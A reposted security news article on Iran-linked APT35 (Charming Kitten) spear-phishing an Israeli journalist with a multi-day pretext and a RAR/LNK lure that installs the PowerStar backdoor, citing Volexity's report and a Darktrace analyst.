Iran-Linked APT35 Targets Israeli Media With Upgraded Spear-Phishing Tools

The APT35 group (aka Charming Kitten) has added backdoor capabilities to their spear-phishing payloads — and targeted an Israeli reporter with it.

The Iran-linked threat group known as APT35 (aka Charming Kitten, Imperial Kitten, or Tortoiseshell) has updated its cyberattack arsenal with improved abilities to hide its actions, as well as an upgraded custom backdoor that its distributing via a spear-phishing campaign.
The advanced persistent threat (APT) has been alleged to be operating out of Iran and primarily concerned with collecting intelligence by compromising account credentials and, subsequently, the email of individuals they successfully spear-phish.
According to a
blog post published by Volexity
, the group has recently attempted a spear-phishing campaign targeting an Israeli journalist with a draft report lure. The draft report was a password-protected RAR file containing a malicious LNK file which downloaded a backdoor.
The incident was a highly targeted attack; prior to sending malware to the victim, the attackers asked if the person would be open to reviewing a document they had written related to US foreign policy. The target agreed to do so, since this is not an unusual request in the journalism line of work, but APT35 didnt send it right away — instead, the attackers continued the interaction with another benign email containing a list of questions, to which the target then responded with answers. After multiple days of benign and seemingly legitimate interaction, the attackers finally sent the draft report loaded with malware.
Toby Lewis, global head of threat analysis at Darktrace, says APT35s targeting profile is very much in the theme of what youd expect to see from a group associated to the Iranian government. He says: This is a group thats trying to be bespoke, be stealthy, and stay under the radar, and so to do that youre also going to really focus your social engineering to try and improve that return on the investment.
In this most recent campaign, it delivered the PowerStar malware — an updated version of one of its known backdoors, known as
CharmPower
— which it sent via an email containing an .LNK file inside a password-protected .RAR file.
When executed by a user, the .LNK file downloads PowerStar from the Backblaze hosting provider and attacker-controlled infrastructure, according to Volexitys report. PowerStar then collects a small amount of system information from the compromised machine and sends it via a POST request to a command-and-control (C2) address downloaded from Backblaze.
Volexity believes this variant of PowerStar to be especially complex, and suspects that it is likely supported by a custom server-side component, which automates simple actions for the malware operator. Also, a decryption function is downloaded from remotely hosted files which hinders detection of the malware outside of memory and gives the attacker a kill switch to prevent future analysis of the malwares key functionality.
With PowerStar, Charming Kitten sought to limit the risk of exposing their malware to analysis and detection by delivering the decryption method separately from the initial code and never writing it to disk, the company said. This has the added bonus of acting as an operational guardrail, as decoupling the decryption method from its command-and-control server prevents future successful decryption of the corresponding PowerStar payload.
Lewis says that quest for return on investment for APT groups sometimes drives relatively unsophisticated, low-effort campaigns, but more often, youve got groups that are going to get as sophisticated as they need to be to meet their objectives. What that means can run the gamut: Some will be able to develop zero days, as opposed to just using something they got from somebody else; others will demonstrate sophistication in how they manage and control their infrastructure.
The latter is the case with APT35. When youve got the trade craft that weve got this group using, effectively bringing down custom payloads, its bringing down different modules from third party services, he says. Each different payload is going to be a little bit different, a little bit tweaked, and a little bit tuned, and ... that sort of approach is absolutely what youd expect to see.
Nonetheless, Volexity researchers said they regularly observe operations from the APT, but finds the group to rarely deploy malware as part of their attacks. This sparing use of malware in their operations likely increases the difficulty of tracking their attacks, according to the firm.
APT35 has been active for more than a decade. According to a
2021 blog
from Darktrace, APT35 has in that time launched extensive campaigns against organizations and officials across North America and the Middle East; public attribution has characterized APT35 as an
Iran-based
nation state threat actor. Recent campaigns were suspected to be in service to
Irans potential physical targeting of dissenters for kidnapping
and other kinetic ops.

Last News
▸ ArcSight prepares for future at user conference post HP acquisition. ◂ Discovered: 07/01/2025 Category: security	▸ Samsung Epic 4G: First To Use Media Hub ◂ Discovered: 07/01/2025 Category: security	▸ Many third-party software fails security tests ◂ Discovered: 07/01/2025 Category: security

**Cyber Security Categories**
Google Dorks Database	Exploits Vulnerability	Exploit Shellcodes

CVE List

Tools/Apps

News/Aarticles

Phishing Database

Deepfake Detection

Trends/Statistics & Live Infos

Tags:
Iran-Linked APT35 Targets Israeli Media With Upgraded Spear-Phishing Tools